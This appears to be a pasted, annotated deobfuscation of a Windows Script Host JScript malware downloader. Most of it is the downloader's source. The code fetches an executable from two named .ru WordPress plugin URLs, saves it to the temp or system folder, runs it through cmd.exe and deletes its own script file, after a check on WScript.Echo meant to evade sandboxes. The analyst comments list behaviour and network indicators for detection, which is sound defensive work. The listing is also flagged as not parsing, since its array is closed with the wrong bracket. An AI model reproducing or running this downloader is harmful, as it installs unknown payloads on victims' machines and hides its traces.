lucifer63

2990.js

Sep 29th, 2016
  /**
   * Analyst annotation (deobfuscated WSH/JScript downloader): chooses the folder
   * whose path the caller uses as the prefix of the dropped file's name.
   *
   * Despite the name, this does not always return the system folder: it returns
   * GetSpecialFolder(2) (TemporaryFolder) when WScript.Network reports UserDomain
   * as a string, and GetSpecialFolder(1) (SystemFolder) otherwise.
   *
   * @param scripting_file_system_object  Scripting.FileSystemObject instance created by the caller.
   * @returns the value returned by GetSpecialFolder; the caller concatenates it with a string.
   */
  1. function get_system_folder_path(scripting_file_system_object) {
  2.     var system_folder_path = "",
  3.         ws_network_object = WScript["CreateObject"]("WScript.Network");
  4.  
  5.     /*
  6.  
  7.     index=0, WindowsFolder, the windows folder contains files installed by the Windows operating system.
  8.     index=1, SystemFolder, the system folder contains libraries, fonts, and device drivers.
  9.     index=2, TemporaryFolder, the temp folder is used to store temporary files. Its path is found in the TMP environment variable.
  10.  
  11.     */
  12.  
          // Presumably an environment check: a string UserDomain selects the temp folder,
          // anything else falls back to the system folder — confirm against the original sample.
  13.     if (typeof ws_network_object["UserDomain"] == "string") {
  14.         system_folder_path = scripting_file_system_object["GetSpecialFolder"](2);
  15.     } else {
  16.         system_folder_path = scripting_file_system_object["GetSpecialFolder"](1);
  17.     }
  18.  
  19.     return system_folder_path;
  20. }
  21.  
  /**
   * Analyst annotation: download-and-run stage of the script.
   *
   * Issues a GET for link_to_file through MSXML2.XMLHTTP and, on HTTP 200, writes the
   * response body to disk via ADODB.Stream, starts it with `cmd.exe /c` through
   * Wscript.Shell, then deletes the running script file.
   *
   * Behaviour worth alerting on, all visible below: a script host making an outbound
   * HTTP request, writing a binary stream to an extension-less path ending in "not",
   * spawning cmd.exe on that path, and removing its own script afterwards.
   *
   * @param link_to_file  URL to fetch.
   * @returns true once the body was saved and launched; false when send() throws
   *          or the status is not 200.
   */
  22. function load_and_execute_file(link_to_file) {
          // NOTE(review): self-assignments, presumably left over from renaming obfuscated
          // aliases of the host objects — read this listing as a description of behaviour,
          // not as a faithful copy of the sample.
  23.     var WScript = WScript;
  24.     var ActiveXObject = ActiveXObject;
  25.     var msxml2_xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
  26.     var scripting_file_system_object = new ActiveXObject("Scripting.FileSystemObject");
  27.  
          // Third argument is the async flag; 0 makes the request synchronous.
  28.     msxml2_xmlhttp["open"]("GET", link_to_file, 0);
  29.  
          // Any send() failure is swallowed and reported as false, so the top-level loop
          // moves on to the next URL without leaving an error on screen.
  30.     try {
  31.         msxml2_xmlhttp.send();
  32.     } catch (error) {
  33.         return false;
  34.     }
  35.  
          // Only an exact 200 is accepted; redirects or error pages count as failure.
  36.     if (msxml2_xmlhttp["Status"] == 200) {
  37.         var adodb_stream = new ActiveXObject("ADODB.Stream");
              // No path separator is inserted: the target is the folder path string with
              // "not" appended and no extension — NOTE(review): confirm the exact on-disk
              // name against the original sample before using it as a file indicator.
  38.         var masked_file_path = get_system_folder_path(scripting_file_system_object) + "not";
  39.  
  40.         adodb_stream["Open"]();
              // Type 1 is adTypeBinary in ADO: the response is written as raw bytes.
  41.         adodb_stream["Type"] = 1;
  42.  
  43.         var response_body = msxml2_xmlhttp["ResponseBody"];
  44.  
  45.         adodb_stream["Write"](response_body);
  46.         adodb_stream["Position"] = 0;
              // SaveToFile is called without a SaveOptions argument.
  47.         adodb_stream["SaveToFile"](masked_file_path);
  48.         adodb_stream["Close"]();
  49.  
              // Process-creation telemetry should show the script host as parent of
              // `cmd.exe /c <dropped path>`.
  50.         var command = "cmd.exe /c " + masked_file_path;
  51.         var WScript_shell = new ActiveXObject("Wscript.Shell");
  52.  
              // Second argument is the window-style value passed to Run; 25 is outside the
              // documented 0-10 range — NOTE(review): effect unverified.
  53.         WScript_shell["run"](command, 25);
              // Self-deletion of the launcher script: the .js is normally gone by the time of
              // triage, so rely on process, network and file-creation logs instead.
  54.         scripting_file_system_object["deleteFile"](WScript["ScriptFullName"]);
  55.  
  56.         return true;
  57.     } else {
  58.         return false;
  59.     }
  60.  
          // Unreachable: both branches above return.
  61.     return true;
  62. }
  63.  
  // Entry point (analyst annotation). The body runs only when typeof WScript.Echo is
  // "unknown" — presumably a check that the script is running under the real Windows
  // Script Host, which would leave it inert in environments that model WScript.Echo as
  // an ordinary function; confirm against the original sample.
  64. if (typeof WScript.Echo == "unknown") {
          // Network indicators: both URLs are plain HTTP and request the same file name
          // under the same WordPress plugin directory on two different hosts — presumably
          // compromised sites used as interchangeable mirrors.
          // NOTE(review): the array literal is closed with `}` in this paste, so the
          // listing does not parse as written.
  65.     var links_to_files = [
  66.         "http://resog.ru/wp-content/plugins/libravatar-replace/systemdll.exe",
  67.         "http://sdng.ru/wp-content/plugins/libravatar-replace/systemdll.exe"
  68.     },
  69.         file_loaded_and_executed = false,
  70.         scripts_to_process = 2,
  71.         scripts_processed = 0;
  72.  
          // Tries the URLs in order and stops at the first one that was downloaded and
          // launched; gives up once scripts_to_process attempts have been made.
  73.     while (!file_loaded_and_executed) {
  74.         file_loaded_and_executed = load_and_execute_file(links_to_files[scripts_processed]);
  75.  
  76.         scripts_processed++;
  77.  
  78.         if (scripts_processed == scripts_to_process) {
  79.             break;
  80.         }
  81.     }
  82. }